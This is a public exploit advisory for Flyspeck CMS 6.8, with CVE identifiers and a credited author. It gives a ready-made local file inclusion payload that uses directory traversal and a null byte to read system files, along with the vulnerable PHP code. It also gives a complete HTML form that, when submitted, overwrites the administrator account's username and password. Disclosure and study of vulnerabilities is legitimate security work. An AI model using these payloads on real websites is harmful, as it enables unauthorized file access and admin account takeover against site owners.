Flyspeck CMS 6.8 Remote LFI / Change Add Admin Exploit

2009-05-25 / 2009-05-26
Credit: ahmadbady
Risk: High
Local: No
Remote: Yes
CVE: CVE-2009-1770 | CVE-2009-1771
CWE: CWE-22

=-=-remote change add admin xpl/lfi-=-= -=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=-= script::Flyspeck CMS 6.8 ------------------------------------------------- Author: ahmadbady my site :Coming Soon =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= download from:http://www.flyspeck.net/purchase/download_trial.php -------------------------------------------------- lfi: includes/database/examples/addressbook.php?lang=../../../../boot.ini%00 $lang = isset($_GET['lang']) ? $_GET['lang'] : 'de'; line 28 include "lang." . $lang . ".inc"; line 29 -------------------------- change pass and add admin: <h2>coded by ahmadbady</h2> <form name="editUser" action="/flyspeck/index.php?event=updateExistingContent" onsubmit="return validateForm(this)" method="post" enctype="multipart/form-data"><label name="Name">Name</label> <input type="text" name="users[fullname]" value="admin" /> <label name="Email">Email</label><input type="text" name="users[email]" value="admin" /> <label name="Role">Role</label><select name="users[role_id]"><option value="1" label="admin" /> </select><label name="Username">Username</label><input type="text" name="users[username]" value="admin" /> <label name="Password">Password</label><input type="text" name="users[password]" value="admin" /> <input type="hidden" name="id" value="1" /><input type="hidden" name="defName" value="users" /> <input type="submit" name="1" value="Save" /></form>


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top